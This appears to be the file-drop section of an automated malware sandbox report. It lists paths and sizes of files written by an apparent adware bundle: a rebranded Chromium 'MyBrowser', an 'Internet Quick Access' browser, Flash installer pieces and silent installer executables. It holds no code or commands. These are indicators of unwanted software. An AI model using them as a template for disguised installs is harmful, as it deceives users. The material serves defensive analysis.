%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_yOentjedkNlWMUS (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\32.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Visited Links (284 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\31.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\26.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History (21181 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_r6aGBN8ReJ2GMKt (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_2 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites-journal (12948 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data (22997 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_1 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_0 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_3 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History-journal (4756 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\28.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data-journal (1580 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\29.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_sUlVw20TbJznEkx (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\First Run (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7db7_appcompat.txt (13516 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2F.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\avg23.exe (43108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe (162513 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf16.tmp (5641 bytes)
%System%\Macromed\Flash\FlashInstall.log (2 bytes)
%System%\FlashPlayerApp.exe (3851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (1779 bytes)
%System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll (121304 bytes)
%System%\Macromed\Flash\manifest.json (2 bytes)
%System%\Macromed\Flash\pepper.vch (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (7386 bytes)
%System%\Macromed\Flash\FlashPlayerUpdateService.exe (268 bytes)
%System%\FlashPlayerCPLApp.cpl (142 bytes)
%System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\chrome.7z (1161171 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\id.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-CN.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\chrome.7z (1135976 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_elf.dll (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\splash-620x300.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-BR.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-TW.pak (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\secondarytile.png (637 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lv.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\uk.pak (1687 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\d3dcompiler_47.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nb.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bn.pak (1829 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fil.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sr.pak (1670 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\mr.pak (1802 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fi.pak (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_32.nexe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\kn.pak (3668 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\natives_blob.bin (1685 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\te.pak (1862 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\it.pak (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fr.pak (278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ml.pak (3734 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_child.dll (335724 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es-419.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\icudtl.dat (75554 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libegl.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ms.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sw.pak (238 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ko.pak (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lt.pak (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-US.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ru.pak (1673 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fa.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\da.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\el.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_watcher.dll (1657 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Quick Access\Internet Quick Access.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ta.pak (3681 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\de.pak (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sk.pak (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_200_percent.pak (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ar.pak (1629 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\he.pak (297 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_64.nexe (23407 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\smalllogo.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sv.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\metro_driver.dll (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hi.pak (1809 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\45.0.2433.0.manifest (248 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\resources.pak (130562 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\vi.pak (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-PT.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Extensions\external_extensions.json (99 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome.dll (299767 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\snapshot_blob.bin (1713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\gu.pak (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\cs.pak (260 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pl.pak (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bg.pak (1705 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (3700 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\delegate_execute.exe (3760 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\am.pak (1640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hr.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\et.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libglesv2.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ca.pak (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sl.pak (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ro.pak (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl64.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\VisualElementsManifest.xml (401 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\th.pak (1788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hu.pak (274 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nl.pak (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\tr.pak (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\logo.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libexif.dll (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ja.pak (311 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-GB.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (16808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (274744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6481.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\87D37.dmp (226144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq21.tmp (20400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
